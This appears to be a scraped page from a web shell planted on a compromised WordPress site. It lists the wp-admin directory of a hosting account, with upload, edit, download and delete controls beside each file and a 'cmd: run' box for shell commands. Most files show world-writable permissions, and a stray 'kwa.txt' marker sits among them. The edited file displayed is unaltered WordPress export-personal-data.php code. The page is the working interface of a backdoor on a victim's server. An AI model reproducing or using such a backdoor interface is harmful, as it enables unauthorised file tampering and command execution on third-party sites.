/
home
/
techb158
/
public_html
/
wp-admin
/
/home/techb158/public_html/wp-admin
mkdir
upload
Name
Size
Mode
Actions
css/
-
0777
rm
images/
-
0777
rm
includes/
-
0777
rm
js/
-
0777
rm
maint/
-
0777
rm
network/
-
0777
rm
user/
-
0777
rm
about.php
16485
0666
edit
dl
rm
admin-ajax.php
5146
0666
edit
dl
rm
admin-footer.php
2804
0666
edit
dl
rm
admin-functions.php
472
0666
edit
dl
rm
admin-header.php
9284
0666
edit
dl
rm
admin-post.php
2021
0666
edit
dl
rm
admin.php
12935
0666
edit
dl
rm
async-upload.php
5604
0666
edit
dl
rm
authorize-application.php
10335
0666
edit
dl
rm
comment.php
11643
0666
edit
dl
rm
contribute.php
5656
0666
edit
dl
rm
credits.php
4141
0666
edit
dl
rm
custom-background.php
482
0666
edit
dl
rm
custom-header.php
492
0666
edit
dl
rm
customize.php
11586
0666
edit
dl
rm
edit-comments.php
14484
0666
edit
dl
rm
edit-form-advanced.php
29481
0666
edit
dl
rm
edit-form-blocks.php
15528
0666
edit
dl
rm
edit-form-comment.php
13980
0666
edit
dl
rm
edit-link-form.php
6347
0666
edit
dl
rm
edit-tag-form.php
10658
0666
edit
dl
rm
edit-tags.php
22510
0666
edit
dl
rm
edit.php
19952
0666
edit
dl
rm
erase-personal-data.php
7505
0666
edit
dl
rm
export-personal-data.php
7940
0666
edit
dl
rm
export.php
11265
0666
edit
dl
rm
font-library.php
1480
0666
edit
dl
rm
freedoms.php
4574
0666
edit
dl
rm
import.php
7766
0666
edit
dl
rm
index.php
1088
0444
edit
dl
rm
install-helper.php
6961
0666
edit
dl
rm
install.php
18375
0666
edit
dl
rm
kwa.txt
1
0644
edit
dl
rm
link-add.php
934
0666
edit
dl
rm
link-manager.php
4361
0666
edit
dl
rm
link-parse-opml.php
2721
0666
edit
dl
rm
link.php
2957
0666
edit
dl
rm
load-scripts.php
2070
0666
edit
dl
rm
load-styles.php
2995
0666
edit
dl
rm
media-new.php
3249
0666
edit
dl
rm
media-upload.php
3668
0666
edit
dl
rm
media.php
819
0666
edit
dl
rm
menu-header.php
10052
0666
edit
dl
rm
menu.php
18134
0666
edit
dl
rm
moderation.php
307
0666
edit
dl
rm
ms-admin.php
196
0666
edit
dl
rm
ms-delete-site.php
4613
0666
edit
dl
rm
ms-edit.php
216
0666
edit
dl
rm
ms-options.php
229
0666
edit
dl
rm
ms-sites.php
215
0666
edit
dl
rm
ms-themes.php
217
0666
edit
dl
rm
ms-upgrade-network.php
219
0666
edit
dl
rm
ms-users.php
215
0666
edit
dl
rm
my-sites.php
4831
0666
edit
dl
rm
nav-menus.php
50199
0666
edit
dl
rm
network.php
5523
0666
edit
dl
rm
options-connectors.php
1543
0666
edit
dl
rm
options-discussion.php
16403
0666
edit
dl
rm
options-general.php
22855
0666
edit
dl
rm
options-head.php
614
0666
edit
dl
rm
options-media.php
6640
0666
edit
dl
rm
options-permalink.php
22491
0666
edit
dl
rm
options-privacy.php
10704
0666
edit
dl
rm
options-reading.php
10198
0666
edit
dl
rm
options-writing.php
9404
0666
edit
dl
rm
options.php
14266
0666
edit
dl
rm
plugin-editor.php
14071
0666
edit
dl
rm
plugin-install.php
7433
0666
edit
dl
rm
plugins.php
30744
0666
edit
dl
rm
post-new.php
2768
0666
edit
dl
rm
post.php
10821
0666
edit
dl
rm
press-this.php
2470
0666
edit
dl
rm
privacy-policy-guide.php
3756
0666
edit
dl
rm
privacy.php
2512
0666
edit
dl
rm
profile.php
283
0666
edit
dl
rm
revision.php
5836
0666
edit
dl
rm
setup-config.php
17928
0666
edit
dl
rm
site-editor.php
12483
0666
edit
dl
rm
site-health-info.php
4173
0666
edit
dl
rm
site-health.php
10427
0666
edit
dl
rm
term.php
2249
0666
edit
dl
rm
theme-editor.php
17279
0666
edit
dl
rm
theme-install.php
24315
0666
edit
dl
rm
themes.php
49728
0666
edit
dl
rm
tools.php
3514
0666
edit
dl
rm
update-core.php
46202
0666
edit
dl
rm
update.php
13062
0666
edit
dl
rm
upgrade-functions.php
341
0666
edit
dl
rm
upgrade.php
6390
0666
edit
dl
rm
upload.php
15292
0666
edit
dl
rm
user-edit.php
41844
0666
edit
dl
rm
user-new.php
24664
0666
edit
dl
rm
users.php
25698
0666
edit
dl
rm
widgets-form-blocks.php
5235
0666
edit
dl
rm
widgets-form.php
19588
0666
edit
dl
rm
widgets.php
1112
0666
edit
dl
rm
Edit:
/home/techb158/public_html/wp-admin/export-personal-data.php
(7940B)
<?php /** * Privacy tools, Export Personal Data screen. * * @package WordPress * @subpackage Administration */ /** WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; if ( ! current_user_can( 'export_others_personal_data' ) ) { wp_die( __( 'Sorry, you are not allowed to export personal data on this site.' ) ); } // Used in the HTML title tag. $title = __( 'Export Personal Data' ); // Contextual help - choose Help on the top right of admin panel to preview this. get_current_screen()->add_help_tab( array( 'id' => 'overview', 'title' => __( 'Overview' ), 'content' => '<p>' . __( 'This screen is where you manage requests for an export of personal data.' ) . '</p>' . '<p>' . __( 'Privacy Laws around the world require businesses and online services to provide an export of some of the data they collect about an individual, and to deliver that export on request. The rights those laws enshrine are sometimes called the "Right of Data Portability". It allows individuals to obtain and reuse their personal data for their own purposes across different services. It allows them to move, copy or transfer personal data easily from one IT environment to another.' ) . '</p>' . '<p>' . __( 'The tool associates data stored in WordPress with a supplied email address, including profile data and comments.' ) . '</p>' . '<p><strong>' . __( 'Note: Since this tool only gathers data from WordPress and participating plugins, you may need to do more to comply with export requests. For example, you should also send the requester some of the data collected from or stored with the 3rd party services your organization uses.' ) . '</strong></p>', ) ); get_current_screen()->add_help_tab( array( 'id' => 'default-data', 'title' => __( 'Default Data' ), 'content' => '<p>' . __( 'WordPress collects (but <em>never</em> publishes) a limited amount of data from registered users who have logged in to the site. Generally, these users are people who contribute to the site in some way -- content, store management, and so on. With rare exceptions, these users do not include occasional visitors who might have registered to comment on articles or buy products. The data WordPress retains can include:' ) . '</p>' . '<p>' . __( '<strong>Profile Information</strong> — user email address, username, display name, nickname, first name, last name, description/bio, and registration date.' ) . '</p>' . '<p>' . __( '<strong>Community Events Location</strong> — The IP Address of the user, which populates the Upcoming Community Events dashboard widget with relevant information.' ) . '</p>' . '<p>' . __( '<strong>Session Tokens</strong> — User login information, IP Addresses, Expiration Date, User Agent (Browser/OS), and Last Login.' ) . '</p>' . '<p>' . __( '<strong>Comments</strong> — For user comments, Email Address, IP Address, User Agent (Browser/OS), Date/Time, Comment Content, and Content URL.' ) . '</p>' . '<p>' . __( '<strong>Media</strong> — A list of URLs for media files the user uploads.' ) . '</p>', ) ); $privacy_policy_guide = '<p>' . sprintf( /* translators: %s: URL to Privacy Policy Guide screen. */ __( 'If you are not sure, check the plugin documentation or contact the plugin author to see if the plugin collects data and if it supports the Data Exporter tool. This information may be available in the <a href="%s">Privacy Policy Guide</a>.' ), admin_url( 'options-privacy.php?tab=policyguide' ) ) . '</p>'; get_current_screen()->add_help_tab( array( 'id' => 'plugin-data', 'title' => __( 'Plugin Data' ), 'content' => '<p>' . __( 'Many plugins may collect or store personal data either in the WordPress database or remotely. Any Export Personal Data request should include data from plugins as well.' ) . '</p>' . $privacy_policy_guide . '<p>' . __( 'If you are a plugin author, you can learn more about <a href="https://developer.wordpress.org/plugins/privacy/adding-the-personal-data-exporter-to-your-plugin/">how to add the Personal Data Exporter to a plugin</a>.' ) . '</p>', ) ); get_current_screen()->set_help_sidebar( '<p><strong>' . __( 'For more information:' ) . '</strong></p>' . '<p>' . __( '<a href="https://wordpress.org/documentation/article/tools-export-personal-data-screen/">Documentation on Export Personal Data</a>' ) . '</p>' . '<p>' . __( '<a href="https://wordpress.org/support/forums/">Support forums</a>' ) . '</p>' ); // Handle list table actions. _wp_personal_data_handle_actions(); // Cleans up failed and expired requests before displaying the list table. _wp_personal_data_cleanup_requests(); wp_enqueue_script( 'privacy-tools' ); add_screen_option( 'per_page', array( 'default' => 20, 'option' => 'export_personal_data_requests_per_page', ) ); $_list_table_args = array( 'plural' => 'privacy_requests', 'singular' => 'privacy_request', ); $requests_table = _get_list_table( 'WP_Privacy_Data_Export_Requests_List_Table', $_list_table_args ); $requests_table->screen->set_screen_reader_content( array( 'heading_views' => __( 'Filter export personal data list' ), 'heading_pagination' => __( 'Export personal data list navigation' ), 'heading_list' => __( 'Export personal data list' ), ) ); $requests_table->process_bulk_action(); $requests_table->prepare_items(); require_once ABSPATH . 'wp-admin/admin-header.php'; ?> <div class="wrap nosubsub"> <h1><?php esc_html_e( 'Export Personal Data' ); ?></h1> <p><?php _e( 'This tool helps site owners comply with local laws and regulations by exporting known data for a given user in a .zip file.' ); ?></p> <hr class="wp-header-end" /> <?php settings_errors(); ?> <form action="<?php echo esc_url( admin_url( 'export-personal-data.php' ) ); ?>" method="post" class="wp-privacy-request-form"> <h2><?php esc_html_e( 'Add Data Export Request' ); ?></h2> <div class="wp-privacy-request-form-field"> <table class="form-table"> <tr> <th scope="row"> <label for="username_or_email_for_privacy_request"><?php esc_html_e( 'Username or email address' ); ?></label> </th> <td> <input type="text" required class="regular-text ltr" id="username_or_email_for_privacy_request" name="username_or_email_for_privacy_request" /> </td> </tr> <tr> <th scope="row"> <?php _e( 'Confirmation email' ); ?> </th> <td> <input type="checkbox" name="send_confirmation_email" id="send_confirmation_email" value="1" checked="checked" /> <label for="send_confirmation_email"> <?php _e( 'Send personal data export confirmation email.' ); ?> </label> </td> </tr> </table> <p class="submit"> <?php submit_button( __( 'Send Request' ), 'secondary', 'submit', false ); ?> </p> </div> <?php wp_nonce_field( 'personal-data-request' ); ?> <input type="hidden" name="action" value="add_export_personal_data_request" /> <input type="hidden" name="type_of_action" value="export_personal_data" /> </form> <hr /> <?php $requests_table->views(); ?> <form class="search-form wp-clearfix"> <?php $requests_table->search_box( __( 'Search Requests' ), 'requests' ); ?> <input type="hidden" name="filter-status" value="<?php echo isset( $_REQUEST['filter-status'] ) ? esc_attr( sanitize_text_field( $_REQUEST['filter-status'] ) ) : ''; ?>" /> <input type="hidden" name="orderby" value="<?php echo isset( $_REQUEST['orderby'] ) ? esc_attr( sanitize_text_field( $_REQUEST['orderby'] ) ) : ''; ?>" /> <input type="hidden" name="order" value="<?php echo isset( $_REQUEST['order'] ) ? esc_attr( sanitize_text_field( $_REQUEST['order'] ) ) : ''; ?>" /> </form> <form method="post"> <?php $requests_table->display(); $requests_table->embed_scripts(); ?> </form> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php';
Save
cmd:
run